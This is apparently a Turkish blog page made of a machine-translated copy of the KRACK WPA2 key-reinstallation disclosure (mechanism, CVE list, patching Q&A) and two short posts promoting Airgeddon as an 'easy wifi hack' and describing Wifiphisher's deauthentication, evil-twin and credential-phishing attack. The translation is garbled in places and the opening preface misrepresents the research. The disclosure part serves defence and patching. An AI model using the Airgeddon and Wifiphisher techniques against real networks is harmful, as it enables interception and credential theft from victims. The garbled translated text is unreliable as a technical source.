WPA2 Anahtar Yeniden Yükleme Saldırılari


Okumaya başlamadan önce söylemek istediğim bir kaç sey war bu SSL sertifikalari zaten bi şekilde atlatılabiliyordu. Wpa - Wpa2 de kırılabiliyordu. Mitm saldırısını yeni bişeymiş gibi ortaya çıkması acayip geldi bana ek olarak bu yöntemle modeme değil ağa bagli clientlerin cihazina girilebiliyor yani telefonunuza bilgisayariniza.. bunu ben zaten Buradaki Konumda nasıl yapildiğini anlatmıştım. 

GİRİŞ
WPA2'de, modern korunan tüm Wi-Fi şebekelerini güvence altına alan bir protokol olan ciddi zayıflıkları keşfettik. Bir kurban aralığındaki bir saldırgan, anahtar yeniden yükleme saldırıları (KRACK) kullanarak bu zayıf noktaları kullanabilir. Somut olarak, saldırganlar, daha önce güvenli bir şekilde şifrelendiği varsayılan bilgileri okumak için bu yeni saldırı tekniğini kullanabilirler. Bu, kredi kartı numaraları, şifreler, sohbet mesajları, e-postalar, fotoğraflar ve benzeri gibi hassas bilgileri çalmak için istismar edilebilir. Saldırı, modern korunan tüm Wi-Fi şebekelerine karşı çalışır. Ağ yapılandırmasına bağlı olarak, veriyi enjekte etmek ve değiştirmek mümkündür. Örneğin, bir saldırgan web sitelerine fidye veya diğer zararlı yazılım enjekte edebilir.

Zayıf yönler, Wi-Fi standardının kendisindedir ve bireysel ürünler veya uygulamalarda değildir. Bu nedenle, WPA2'nin doğru bir şekilde uygulanması muhtemelen etkilenir. Saldırı önlemek için, güvenlik güncelleştirmeleri hazır olduğunda etkilenen ürünleri güncelleştirmeleri gerekir. Cihazınızın Wi-Fi'yi destekliyorsa büyük olasılıkla etkilenir. İlk araştırmamız sırasında, Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys ve diğerlerinin saldırıların bazı çeşitlemelerinden etkilendiğini keşfettik. Belirli ürünler hakkında daha fazla bilgi için CERT / CC veritabanına bakın veya satıcınıza başvurun.

Saldırının arkasındaki araştırma, Bilgisayar ve İletişim Güvenliği (CCS) konferansında ve Black Hat Avrupa konferansında sunulacak. Ayrıntılı araştırma kâğıdı indirilebilir.


GÖSTERİ
Bir kanıtı kanıt olarak, bir Android akıllı telefona karşı yeniden kurulum saldırısı gerçekleştirdik. Bu demonstrasyonda, saldırgan, kurbanın ilettiği tüm verilerin şifresini çözebilir. Bir saldırgan için bunu gerçekleştirmek kolaydır, çünkü önemli yeniden yükleme saldırısı Linux'a ve Android 6.0 veya daha yenisine karşı son derece yıkıcıdır. Bunun nedeni, Android ve Linux'un tamamen sıfır olan bir şifreleme anahtarı (tekrar yüklenmesi) haline sokulabileceğidir (daha fazla bilgi için aşağıya bakın). Diğer cihazlara saldırırken, tüm paketlerin şifresini çözmek daha zor, ancak yine de çok sayıda paket çözülebiliyor. Her durumda, aşağıdaki gösterim, bir saldırganın korunan Wi-Fi ağlarına karşı anahtar yeniden yükleme saldırısı gerçekleştirirken edinebileceği bilgilerin türünü vurgular:


Saldırı, giriş kimlik bilgilerini (e-posta adresleri ve parolalar) kurtarmakla sınırlı değildir. Genel olarak, kurbanın ilettiği herhangi bir veri veya bilgi şifresiz çözülebilir. Ayrıca, kullanılan cihaza ve ağ kurulumuna bağlı olarak, mağdura gönderilen verilerin şifresini çözmek de mümkündür (örneğin bir web sitesinin içeriği). Web siteleri veya uygulamalar HTTPS'yi ek bir koruma katmanı olarak kullanabilirlerse de, bu ekstra korumanın endişe verici sayıda durumda atlatılabileceğini (hala) önermekteyiz. Örneğin, HTTPS daha önce tarayıcı olmayan yazılımlarda, Apple'ın iOS'larında ve OS X'lerinde, Android uygulamalarında, tekrar Android uygulamalarında, bankacılık uygulamalarında ve hatta VPN uygulamalarında bypass edilmiştir.


DETAYLAR
Ana saldırımız WPA2 protokolünün 4 yönlü el sıkışmasına karşı. Bu el sıkışma, bir istemci korumalı bir Kablosuz ağa katılmak istediğinde ve hem istemci hem de erişim noktasının doğru kimlik bilgilerini (örneğin, ağın önceden paylaşılan şifresi) sahip olduğunu onaylamak için kullanılır. Aynı zamanda, 4 yönlü el sıkışma, sonraki tüm trafiği şifrelemek için kullanılacak yeni bir şifreleme anahtarı ile görüşür. Şu anda, tüm modern korunan Wi-Fi ağları 4 yönlü el sıkışma kullanıyor. Bu, tüm bu ağların saldırıdan (bir çeşit değişik) etkilendiğini ima eder. Örneğin, saldırı, kişisel ve kurumsal Wi-Fi ağlarına, eski WPA'ya ve en yeni WPA2 standardına karşı ve hatta yalnızca AES kullanan ağlara karşı çalışır. WPA2'ye yönelik tüm saldırılar, anahtar yeniden yükleme saldırısı (KRACK) adı verilen yeni bir teknik kullanmaktadır:

Anahtar yeniden yükleme saldırıları: üst düzey açıklama

Anahtar yeniden yükleme saldırısında, düşman, bir kurbanın, zaten kullanılmış bir anahtarın yeniden yüklenmesini hileler. Bu, kriptografik el sıkışma mesajlarını işleyip tekrar oynatarak başarılır. Kurban anahtarı yeniden yüklediğinde artan gönderim paketi numarası (örn. Nonce) ve paket paket numarası (yani tekrarlama sayacı) gibi ilke değerlerine sıfırlanır. Aslında, güvenliği garanti altına almak için bir anahtarın yalnızca kurulması ve bir kez kullanılması gerekir. Maalesef bunun WPA2 protokolü tarafından garanti edilemediğini tespit ettik. Kriptografik el sıkışmalarını manipüle ederek, bu zayıflığı uygulamada kötüye kullanabiliriz.

Anahtar yeniden yükleme saldırıları: 4 yollu el sıkışmasına karşı somut örnek

Araştırma makalesinin başlangıcında anlatıldığı gibi, anahtar yeniden yükleme saldırısının arkasındaki fikir şu şekilde özetlenebilir. Bir istemci bir ağa katıldığında, yeni bir şifreleme anahtarı anlaşması için 4 yönlü el sıkışması uygular. Bu anahtar, 4 yönlü el sıkışma mesajı 3'ü aldıktan sonra yüklenecektir. Anahtar yüklendikten sonra, normal veri çerçevelerini bir şifreleme protokolü kullanarak şifrelemek için kullanılacaktır. Bununla birlikte, mesajlar kaybolabilir veya düşebilir, çünkü Erişim Noktası (AP) mesaj olarak 3 uygun cevabı onay olarak almazsa tekrar iletir. Sonuç olarak, müşteri 3 mesajını birden çok kez alabilir. Bu mesajı her aldığında, aynı şifreleme anahtarını yeniden yükleyecek ve böylece artımlı gönderim paketi numarasını (nonce) sıfırlayacak ve şifreleme protokolü tarafından kullanılan tekrar kayıt sayacını alacaktır. Bir saldırganın 4 yönlü el sıkışma mesajının 3 yeniden iletimini toplayıp tekrarlayarak bu nonce sıfırlamaları zorlayabileceğini gösteririz. Nonce yeniden kullanımı bu şekilde zorlanarak, şifreleme protokolüne saldırı yapılabilir, örn., Paketler tekrar oynatılabilir, şifreli çözülebilir ve / veya sahte olabilir. Aynı teknik, grup anahtarı, PeerKey, TDLS ve hızlı BSS geçiş el sıkışma saldırısı için de kullanılabilir.


Pratik etki
Bize göre, en yaygın ve pratik olarak etkili saldırı, 4 yönlü el sıkışmasına karşı yapılan temel yeniden yükleme saldırısıdır. Bu kararı iki gözlem üzerine dayandırıyoruz. İlk olarak, kendi araştırmamız sırasında çoğu müşterinin bundan etkilendiğini tespit ettik. İkincisi, düşmanlar, müşterilerin gönderdikleri paketlerin şifresini çözmek için şifreleri veya çerezleri gibi hassas bilgileri kesmelerine izin vererek bu saldırıyı kullanabilirler. Paketlerin şifresinin çözülmesi mümkündür, çünkü anahtar yeniden yükleme saldırısı, gönderim kodlarının (bazen paket numaraları veya başlatma vektörleri olarak adlandırılır) sıfıra sıfırlanmasına neden olur. Sonuç olarak, geçmişte zaten kullanılan nonce değerleri ile aynı şifreleme anahtarı kullanılır. Buna karşılık, bu, WPA2'nin tüm şifreleme protokollerinin, paketleri şifrelemekte anahtar akışını yeniden kullanmasına neden olur. Keystream'i yeniden kullanan bir mesajın içeriği bilinmesi durumunda, kullanılan anahtar akışını türetmek önemsiz hale gelir. Bu anahtar akışı aynı mesajla iletileri şifresini çözmek için kullanılabilir. Bilinen bir içerik olmadığında, paketlerin şifresini çözmek daha zordur, ancak bazı durumlarda da mümkündür (örneğin İngilizce metin hala çözülebilir). Pratikte, bilinen içeriği olan paketleri bulmak sorun değil, bu nedenle herhangi bir paketin şifresiz çözülebileceği varsayılmalıdır.

Paketlerin şifresini çözme özelliği TCP SYN paketlerinin şifresini çözmek için kullanılabilir. Bu, rakibin bir bağlantıdaki TCP sıra numaralarını edinmesine ve TCP bağlantılarını kaçırmasına izin verir. Sonuç olarak, WPA2 kullanılmış olsa da, düşman şimdi açık Kablosuz ağlara karşı en yaygın saldırılardan birini gerçekleştirebilir: şifrelenmemiş HTTP bağlantılarına kötü amaçlı veriler ekleme. Örneğin, bir saldırgan, kurbanının ziyaret ettiği web sitelerine fidye yazılımı veya kötü amaçlı yazılım enjekte etmek için bunu kötüye kullanabilir.

Kurban AES-CCMP yerine WPA-TKIP veya GCMP şifreleme protokolünü kullanıyorsa, bu etki özellikle felaket derecesinde. Bu şifreleme protokollerine karşı, nonce yeniden kullanımı, bir rakibin sadece şifresini çözmek değil aynı zamanda paketleri yerleştirmesi ve enjekte etmesini sağlar. Üstelik, GCMP her iki iletişim yönünde de aynı kimlik doğrulama anahtarı kullandığından ve bu parolalar yeniden kullanıldığında kurtarılabilir, özellikle etkilenir. GCMP'ye yönelik desteğin şu anda Kablosuz Gigabit (WiGig) adı altında toplandığına ve önümüzdeki birkaç yıl içinde yüksek oranda kabul edilmesi bekleniyor.

Paketlerin şifrelenebileceği (ve muhtemelen dövülebildiği) yön, saldırıya uğradığımız el sıkışmasına bağlıdır. Basitleştirilmiş, 4 yönlü el sıkışma saldırısında, istemci tarafından gönderilen paketlerin şifresini çözmek (ve sahte olabilir). Hızlı BSS Geçiş (FT) el sıkışma saldırısında, istemciye gönderilen paketlerin şifresini çözmek (ve sahte olabilir). Son olarak, saldırılarımızın çoğunda tek noktaya yayın, yayın ve çok noktaya yayılma çerçevelerinin tekrar oynatılmasına da izin verilmektedir. Daha ayrıntılı bilgi için, araştırma makalemizin 6. Bölümüne bakın.

Saldırılarımızın Wi-Fi ağının şifresini kurtarmadığını unutmayın. Ayrıca, 4 yönlü el sıkışması sırasında müzakere edilen yeni şifreleme anahtarını kurtaramazlar (herhangi bir bölümünü).


Android ve Linux
Saldırı, özellikle Linux'ta yaygın olarak kullanılan Wi-Fi istemcisi olan wpa_supplicant'ın 2.4 ve üzeri sürümlerine karşı büyük bir felâkettir. Burada, istemci, gerçek anahtarı yeniden yüklemek yerine tamamen sıfır olan bir şifreleme anahtarı yükleyecektir. Bu güvenlik açığı, Wi-Fi standardında, şifreleme anahtarı ilk kez kurulduktan sonra bellektten silinecek şekilde yapılan bir açıklama nedeniyle ortaya çıkmaktadır. İstemci şimdi 4 yönlü el sıkışmasıyla 3 kez yeniden iletilen bir ileti aldığında, temizlenmiş şifreleme anahtarını tamamen sıfırdan bir anahtar yükleyerek yeniden yükleyecektir. Android, wpa_supplicant kullandığından Android 6.0 ve üzeri de bu güvenlik açığını içerir. Bu, bu Linux ve Android cihazlar tarafından gönderilen trafiği durdurmak ve işlemek için önemsizdir.


Atanan CVE tanımlayıcıları
Aşağıdaki Ortak Güvenlik Açıkları ve Etkilenmeler (CVE) tanımlayıcıları, hangi ürünlerin yeniden kurulum temelli saldırıların belirli örneklemelerinden etkilendiğini izlemek için atandı:

CVE-2017-13077: 4 yönlü el sıkışmasında çift olarak şifreleme anahtarının (PTK-TK) yeniden yüklenmesi.
CVE-2017-13078: 4 yönlü el sıkışmasında grup anahtarının (GTK) yeniden yüklenmesi.
CVE-2017-13079: Dörtlü el sıkışmasında bütünlük grubu anahtarının (IGTK) yeniden yüklenmesi.
CVE-2017-13080: Grup anahtarının el değiştirmesinde grup anahtarının (GTK) yeniden yüklenmesi.
CVE-2017-13081: Grup anahtar el sıkışmasında bütünlük grubu anahtarının (IGTK) yeniden yüklenmesi.
CVE-2017-13082: Yeniden aktarılan Hızlı BSS Geçiş (FT) Yeniden İlişki İsteğini kabul etme ve işleme sırasında çift yönlü şifreleme anahtarını (PTK-TK) yeniden yükleme isteği.
CVE-2017-13084: PeerKey el sıkışmasına STK anahtarının yeniden yüklenmesi.
CVE-2017-13086: Tünelli Doğrudan Bağlantı Kurulumu (TDLS) PeerKey (TPK) anahtarının TDLS el sıkışmasına yeniden yüklenmesi.
CVE-2017-13087: Kablosuz Ağ Yönetimi (WNM) Uyku Modu Yanıt çerçevesini işlerken grup anahtarının (GTK) yeniden yüklenmesi.
CVE-2017-13088: Kablosuz Ağ Yönetimi (WNM) Uyku Modu Yanıt çerçevesini işlerken bütünlük grubu anahtarının (IGTK) yeniden yüklenmesi.
Her bir CVE tanımlayıcısının anahtar yeniden yükleme saldırısının belirli bir örneğini temsil ettiğini unutmayın. Bu, her bir CVE Kimliğinin belirli bir protokol güvenlik açığını açıkladığı ve bu nedenle birçok satıcı tek tek CVE kimliğinden etkilenir olduğu anlamına gelir. Hangi ürünlerin etkilenebileceği hakkında ek ayrıntılar için CERT / CC'nin güvenlik belgesi notu VU # 228519'u da okuyabilirsiniz.


KAĞIT
Saldırının arkasındaki araştırma makalemiz, Anahtar Yeniden Yükleme Saldırıları: Nonce Reuse'yi WPA2'ye zorlamaktadır ve 1 Kasım 2017 Çarşamba günü Bilgisayar ve İletişim Güvenliği (CCS) konferansında sunulacaktır.

Bu yazı şimdi kamuoyuna açıklansa da, daha önce inceleme için 19 Mayıs 2017'de sunulmuştur. Bundan sonra sadece küçük değişiklikler yapılmıştır. Sonuç olarak, makaledeki bulgular zaten birkaç aydır. Bu arada, 4 yollu el sıkışmasına karşı önemli yeniden yükleme saldırılarımızı gerçekleştirmek için daha kolay teknikler bulduk. Yeni saldırı tekniğiyle, yalnızca 4 yönlü el sıkışma mesajının 3 şifrelenmiş yeniden gönderimlerini kabul eden uygulamalardan yararlanmak önemsizdir. Özellikle bu, macOS ve OpenBSD'ye saldırmanın kağıtta tartışılandan daha kolay olduğu anlamına gelir.

Aşağıdaki zeyilleri ve hataları vurgulamak isteriz:

Ek: wpa_supplicant v2.6

Linux'un wpa_supplicant v2.6, 4 yollu el sıkışmasında tamamen sıfır şifreleme anahtarı kurulumuna karşı savunmasızdır. Bu John A. Van Boxtel tarafından keşfedildi. Yeni saldırı, orijinal mesaj 1'de kullanılan ANONCE ile tekrarlanan mesajı 3 kurbanına iletmeden önce sahte bir mesaj 1 enjekte ederek çalışır.
Zeyilname: diğer savunmasız el sıkışmaları

Gazetede bildirilen ilk araştırmamızdan sonra TDLS el sıkışma ve WNM Uyku Modu Yanıt çerçevesinin temel yeniden kurulum saldırılarına karşı savunmasız olduğunu keşfettik.

Seçili errata
Saldırının 3. evresindeki Şekil 9'da, düşmandan kimliği doğrulayan kişiye iletilen çerçeve, ReassoResp yerine bir ReassoReq söylemelidir.


ARAÇLAR
4 yönlü el sıkışma, grup anahtarı el sıkışması veya Hızlı BSS Geçiş (FT) el sıkışması uygulamalarının anahtar yeniden yükleme saldırılarına karşı savunmasız olup olmadığını algılayan komut dizileri yaptık. Bu komut dosyaları, kullanım talimatlarını temizleme zamanı geldiğinde serbest bırakılacak.

Ayrıca, belirli Android ve Linux aygıtlarında bulunan sıfırdan bağımsız anahtarın (yeniden) yüklenmesini sömüren bir kanıt-proof betiği yaptık. Bu senaryo, tanıtım videosunda kullandığımız senaryo. Herkes cihazlarını güncellemek için makul bir şans verdikçe serbest bırakılacaktır (ve kod depolarını serbest bırakmaya hazırlamak için bir değişiklik yaptık). Konseptimiz kanıt belgenizin güvenilirliğinin kurbanın gerçek ağa ne kadar yakın olduğuna bağlı olabileceğini belirtmek isteriz. Kurban gerçek ağa çok yakınsa, kurban başarısız olabilir, çünkü mağdur gerçek ağ ile doğrudan iletişim kurar; kurban bu ağdan farklı bir Kablosuz kanalda olsa bile.


S & C
Şimdi WPA3'e ihtiyacımız var mı?

Hayır, şans eseri uygulamalara geriye dönük olarak uyumlu bir şekilde eklenebilir. Bu, yamalı bir istemci hala yamalı bir erişim noktası ile iletişim kurabilir ve tersi anlamına gelir. Başka bir deyişle, yamalı bir istemci ya da erişim noktaları, daha önce olduğu gibi tam olarak aynı anlık iletileri gönderir. Ancak güvenlik güncelleştirmeleri, bir anahtarın yalnızca bir kez yüklenmesini sağlayarak saldırılarımızı önler. Böylece, güvenlik güncellemeleri geldiğinde tüm cihazlarınızı güncelleyin.

Wi-Fi şifremi değiştirmeli miyim?

Kablosuz ağınızın şifresini değiştirmek, saldırıyı engellemez (veya azaltmaz). Dolayısıyla, Kablosuz ağınızın şifresini güncellemenize gerek yoktur. Bunun yerine, tüm aygıtlarınızın güncellendiğinden emin olmalısınız ve yönlendiricinizin ürün yazılımını da güncellemelisiniz. Yönlendiricinizi güncelledikten sonra, isteğe bağlı olarak Wi-Fi şifresini fazladan bir önlem olarak değiştirebilirsiniz.

WPA2'yi sadece AES ile kullanıyorum. Bu da savunmasız mı?

Evet, bu ağ yapılandırması da savunmasızdır. Saldırı hem kişisel ağ hem de kurumsal ağlara karşı ve kullanılan herhangi bir şifre takımına karşı (WPA-TKIP, AES-CCMP ve GCMP) WPA1 ve WPA2'ye karşı çalışır. Dolayısıyla herkes, saldırıyı önlemek için cihazlarını güncellemelidir!

Bu web sitesinde "biz" kelimesini kullanıyorsunuz. Biz kim

"Biz" kelimesini kullanıyorum, çünkü yazılara alışmış oldum. Uygulamada, tüm işler benim tarafımdan yapılır, benimle birlikte Mathy Vanhoef olurum. Müthiş genel rehberlik için müfettişim, onur yazarlığı altında araştırma makalesine eklenmiştir. Fakat gerçek işler tek başıma yapılıyordu. Bu nedenle akademik kağıtların yazar listesi işbölümünü temsil etmez :)

Cihazım savunmasız mı?

Muhtemelen. Wi-Fi kullanan herhangi bir cihaz muhtemelen savunmasızdır. Daha fazla bilgi için satıcınıza başvurun.

Yönlendiricim için güvenlik güncelleştirmesi yoksa ne olur?

Ana saldırımız 4 yönlü el sıkışmasına karşıdır ve erişim noktalarından yararlanmaz, bunun yerine müşterileri hedef alır. Dolayısıyla, yönlendiricinizin güvenlik güncelleştirmeleri gerektirmediği olabilir. Daha fazla ayrıntı için satıcınıza başvurmanızı önemle öneririz. Genel olarak, istemci işlevselliğini (örneğin, tekrarlayıcı modlarında kullanılan) devre dışı bırakarak ve 802.11r'yi (hızlı dolaşım) devre dışı bırakarak yönlendiricilere ve erişim noktalarına yönelik saldırıları azaltmaya çalışabilirsiniz. Sıradan ev kullanıcıları için, önceliğiniz dizüstü bilgisayarlar ve akıllı telefonlar gibi istemcileri güncellemek olmalıdır.

Bu güvenlik açıklarını nasıl buldunuz?

Başka bir makalenin son (yani kamera hazır) sürümü üzerinde çalışırken, OpenBSD'nin 4 yönlü el sıkışmasıyla ilgili bazı iddiaları tekrar kontrol ediyordum. Bir bakıma rahatlamıştım, çünkü koda bakmak yerine sadece kağıdı bitirmem gerekiyordu. Fakat ben, bir sonraki paragrafta çalışmaktan kaçınmak için, daha önce yüzlerce kez okuduğum bazı kodları inceledim. O sırada, ic_set_key için yapılan belirli bir çağrı dikkatimi çekti. Bu işlev, 4 yönlü el sıkışmasının 3 numaralı mesajını işlerken çağrılır ve çift yönlü anahtarı sürücüye yükler. Bu kod satırına bakarken "Ha" diye düşündüm. Bu işlev iki kez çağrılırsa ne olacağını merak ediyorum ". İki kere çağırmanın anahtara bağlı olmayan uçları sıfırlayabileceğini (doğru olarak) tahmin ettiğim zaman. Mesaj 3, Erişim Noktası tarafından yeniden iletilebildiğinden, uygulamada gerçekten iki kez çağrılacaktır. "Bunu not etsen iyi olur. Diğer satıcılar da böyle bir işlevi iki kez arayabilirler. Ama önce bu kağıdı bitirelim ... ". Birkaç hafta sonra, makaleyi bitirdikten ve başka bir çalışmayı tamamladıktan sonra, bu yeni fikri daha ayrıntılı olarak araştırdım. Ve gerisi tarihtir.

4 yönlü el sıkışma matematiksel olarak kanıtlandı. Saldırı nasıl mümkün oluyor?

Kısa cevap, resmi kanıtı bir anahtarı bir kez taktığından emin olmamasıdır. Bunun yerine, yalnızca pazarlık edilen anahtarın gizli kalmasını sağlar ve bu anlaşma mesajlarının dövüşmesi mümkün değildir.

Daha uzun cevap araştırma kağıdımızın girişinde belirtilmiştir: saldırılarımız 4 yönlü el sıkışmasının resmi analizinde kanıtlanmış güvenlik özelliklerini ihlal etmemektedir. Özellikle, bu kanıtlar müzakere edilen şifreleme anahtarının özel kaldığını ve istemcinin ve Erişim Noktasının (AP) kimliğinin doğrulandığını belirtmektedir. Saldırılarımız şifreleme anahtarını sızdırmaz. Ayrıca, TKIP veya GCMP kullanılıyorsa, normal veri çerçeveleri sahte olabilir, ancak bir saldırgan el sıkışma iletilerini oluşturamaz ve dolayısıyla el sıkışmaları sırasında istemciyi veya AP'yi taklit edemez. Bu nedenle, 4 yönlü el sıkışmasının biçimsel analizinde kanıtlanan özellikler doğrudur. Bununla birlikte, sorun delillerin anahtar yüklemeyi modellediği sorunudur. Başka bir ifade ile, resmi modeller müzakere edilmiş bir anahtara ne zaman kurulması gerektiğini tanımlamamıştır. Uygulamada,

Kağıttaki bazı saldırılar zor gibi görünüyor

Saldırılarımızı (örneğin macOS ve OpenBSD'ye karşı) daha genel ve yürütülmesi daha kolay hale getiren takip çalışmaları yaptık. Dolayısıyla, makaledeki saldırı senaryolarının bir kısmının pratik olmadığını kabul etsek de, pratikte kötüye kullanma temelli saldırı saldırılarına inanmanın sizi aldatmasına izin vermeyin.

İnsanlar bunu vahşi ortamda istismar ediyor mu?

Bu güvenlik açığının vahşi ortamda aktif olarak istismar edilip edilmediğini belirleyecek konumda değiliz. Bununla birlikte, anahtar yeniden kurulumlar gerçekte düşman bulunmaksızın kendiliğinden oluşabilir! Örneğin, bir el sıkışmasının son iletisi arka plan gürültüsü nedeniyle kaybolursa, önceki iletinin yeniden iletilmesine neden olabilir. Bu yeniden iletilen mesajı işlerken, anahtarlar yeniden yüklenebilir ve gerçek bir saldırıda olduğu gibi tekrar kullanılmaz.

Cihazlarım yamaya gelene kadar geçici olarak WEP'i kullanmam mı gerekiyor?

YOK HAYIR! WPA2'yi kullanmaya devam et.

Wi-Fi standardı bunun adresine güncellenecek mi?

Saldırılarımızı açıkça önlemek için Wi-Fi standardının güncellenmesi gerektiği konusunda bir anlaşma var gibi görünüyor. Bu güncellemeler büyük olasılıkla eski WPA2 uygulamaları ile geriye dönük uyumludur. Zaman, standartın güncellenecek olup olmayacağını ve nasıl güncelleneceğini gösterecektir.

Wi-Fi Alliance bu güvenlik açıklarına da mı yöneliyor?

Wi-Fi ile tanışık olmayanlar için Wi-Fi Alliance, Wi-Fi cihazlarının belirli birlikte çalışma standartlarına uygun olduğunu gösteren bir organizasyon. Diğer şeyler arasında, bu, farklı satıcılardan gelen Wi-Fi ürünlerinin birlikte iyi çalıştığını garanti eder.

Wi-Fi Alliance'ın, WPA2'de keşfedilen güvenlik açıklarını ortadan kaldırmaya yardımcı olacak bir planı vardır. Özetleyecekler:

Bu güvenlik açığı için genel sertifika laboratuarı ağında sınama yapmasını isteyin.
Herhangi bir Wi-Fi Alliance üyesi tarafından kullanılmak üzere bir güvenlik açığı algılama aracı sağlayın (bu araç, bir aygıtın keşfedilen anahtar yeniden yükleme saldırılarının bazılarına karşı savunmasız olup olmadığını belirleyen kendi algılama aracım temel alır).
Çözümler de dahil olmak üzere bu güvenlik açığıyla ilgili ayrıntıları aygıt satıcılarına geniş ölçüde iletin. Ayrıca, satıcıların gerekli tüm yamaları hızla bütünleştirmek için çözüm sağlayıcılarıyla çalışmaları önerilir.
Kullanıcıların aygıt üreticileri tarafından önerilen en son güvenlik güncelleştirmelerini yüklemelerini sağlamak için önemini belirtin.
Gösterim videosunda match.com'u neden bir örnek olarak kullandın?

Kullanıcılar, match.com gibi web sitelerinde çok sayıda kişisel bilgiyi paylaşıyor. Dolayısıyla bu örnek, bir saldırganın edinebileceği tüm hassas bilgileri vurgular ve umarım bu örnekle insanlar potansiyel (kişisel) etkiyi daha iyi kavrayabilirler. Ayrıca, bu örnek, bu web sitelerinin toplama yaptığı tüm bilgilerin farkındalık yarattığını umuyoruz.

Bu böcek türleri nasıl engellenebilir?

Protokol uygulamalarının daha titiz tetkiklerine ihtiyacımız var. Bu, akademik çevreden yardım ve ek araştırma gerektirir! Diğer araştırmacılarla birlikte, güvenlik protokolü uygulamalarının doğruluğunu iyileştirmek ve doğrulamak için atölye (ler) düzenlemeyi umuyoruz.

Neden alan adı krackattacks.com?

İlk olarak, KRACK saldırılarının pleonasm olduğunun bilincindeyim, çünkü KRACK anahtar yeniden yükleme saldırısı anlamına geliyor ve dolayısıyla zaten saldırı kelimesini içeriyor. Ancak etki alanı adı kafiyeli, bu yüzden kullanılıyor.

Bunun için böbrek lütfu aldınız mı?

Henüz herhangi bir hata cüzdanı için başvurmadım, zaten almadım.

Bu saldırı, WPA2'ye karşı yapılan diğer saldırılarla nasıl karşılaştırılır?

Bu, şifre tahminine dayanmayan WPA2 protokolüne karşı ilk saldırıdır. Gerçekten de, WPA2-etkin ağa karşı yapılan diğer saldırılar, Wi-Fi Korumalı Kurulum (WPS) gibi çevredeki teknolojilere karşı saldırı ya da WPA-TKIP gibi daha eski standartlara yönelik saldırılardır. Başka bir deyişle, var olan saldırıların hiçbiri, 4 yönlü el sıkışma ya da WPA2 protokolünde tanımlanan şifreleme takımlarına karşı değildi. Buna karşılık, 4 yönlü el sıkışmasına (ve diğer el sıkışmalarına) karşı yapılan temel yeniden yükleme saldırısı, WPA2 protokolünün güvenlik açıklarını vurgular.

Diğer protokoller de anahtar yeniden yükleme saldırılarından etkileniyor mu?

Diğer protokollerin bazı uygulamalarının benzer saldırılara karşı savunmasız olmasını bekliyoruz. Bu nedenle, bu saldırıyı göz önünde bulundurarak güvenlik protokolü uygulamalarını denetlemek iyi bir fikirdir. Bununla birlikte, diğer protokol standartlarının benzer saldırılardan (veya en azından umarız) etkileneceğini düşünüyoruz. Yine de, diğer protokolleri denetlemek iyi bir fikirdir!

Logonun daha yüksek çözünürlüklü versiyonu var mı?

Evet var. Ve logoyu yapan kişiye büyük bir teşekkür ederim!

Güvenlik açıklarından satıcıları ilk ne zaman haberdar ettiniz?

Ürünlerini 14 Temmuz 2017'de test ettiğimiz bayilere bildirim gönderdik. Bu satıcılarla iletişim yaptıktan sonra keşfettiğimiz zayıflıkların ne kadar yaygın olduğunu farkettik (ancak o zaman gerçekten kendimizi bir protokol zayıflığı olduğuna ikna ettik. uygulama hataları). Bu noktada, açıkların açıklanmasıyla CERT / CC'nin yardım etmesine karar verdik. Buna karşılık, CERT / CC, satıcılara 28 Ağustos 2017'de kapsamlı bir bildirim gönderdi.

OpenBSD ambargo öncesi neden bir yamayı sessizce serbest bıraktı?

OpenBSD, 15 Temmuz 2017'de CERT / CC'nin koordinasyona dahil edilmesinden önce güvenlik açığı konusunda bilgilendirildi. Theo de Raadt, kısa bir süre önce, "açık kaynak dünyasında, bir kişi bir farklılık yazıyorsa ve bir ay boyunca oturması gerekiyorsa, bu çok cesaret kırıcıdır" şeklindeki geçici duyuruyu eleştirdi. Unutmayın ki, OpenBSD için önerilen bir farkı yazmış ve dahil etmiştim ve bu geçici açıklama tarihi Ağustos ayının sonlarında olmuştur. Bir uzlaşma olarak, güvenlik açığına sessizce uymalarına izin verdim. Gezinirken bu, kötü bir karardı çünkü başkaları, sessiz yamalarını inceleyerek güvenlik açığını yeniden keşfedebilir. Gelecekte bu sorundan kaçınmak için, OpenBSD artık bir ambargonun sonuna yakın açığı bildirim alacak.

Kali Linux Airgeddon - Easy Wifi Hack


Selamun aleyküm ...

Airgeddon Wifi Hack İçin Tasarlanmış Bır Scriptir Kullanışlı Gayet Güzel Hoşuma Gitti Sizlerle Paylasmak İstedım. Anlatılacak Çok Şeyı Yok Numarasını Yazıyorsun Beklıyorsun. Web Wpa Wpa2 Wps Gıbı Desteklerı War Hatta Ewil Twin Bile Var..
 Video: 





Kali Linux Wifiphisher

Selamun Aleyküm ...

 HAKKKİNDA

Wifiphisher Kimlik Bilgilerini Elde Etmek Veya Mağdurlara Malware Bulaştırmak İçin Otomatikleştirilmiş, Özelleştirilmiş Ve Phishing Saldirilarinda Kullanilan Bir Araçtir.
Öncelikle Herhangi Bir Kaba Kuvvet (Brute Force) İçermeyen Diğer Yöntemlerin Aksine, Sosyal Mühendislik Saldırısıdır.
Wifiphisher Kali Linux Üzerinde Çalışır Ve GPL Lisansi İle Lisanslidir.

NASIL ÇALİŞİR ?

Ewil Twin Saldırısını Kullanarak Bir Man İn The Middle (Ordaki Adam,Aradaki Adam) Pozisyonunu Elde Ettikten Sonra Wifiphisher Tüm HTTP İsteklerini Saldırgan Tarafından Kontrol Edilen Kimlik Avı Sayfasina Yönlendirir.

Kurbanın Bakış Açısına Göre, Saldiri Üç Aşamali Olarak Kullanilmaktadir:

 Wifiphisher Varolan İlişkilendirmeleri Bozmak İçin "Deauthenticate" Veya "Disassociate" Paketleri Oluşturarak  Mağdurun Erişim Noktasindaki Tüm Wifi Aygitlarini Sürekli Araliklarla Sıkıştirir Ve Bağlantısı Kesilir. Mağdur Saldırgan Tarafından Yapilan Erişim Noktasina Katilir. Wifiphisher Alani Koklar Ve Hedef Erişim Noktasinin Ayarlarini Kopyalar Daha Sonra Sahte Bir Kablosuz Erişim Noktası Oluşturur. Aynı Zamanda Bir NAT / DHCP Sunucusu Kurar Ve Doğru Bağlantı Noktalarini İletir. Sonuç Olarak Sıkışma (Ağdan Düşme) Nedeniyle Sahte Erişim Noktasına Bağlanmaya Başlayacaktir. Bu Aşamadan Sonra Kurban Mitmed' (Man İn The Middle) dir.

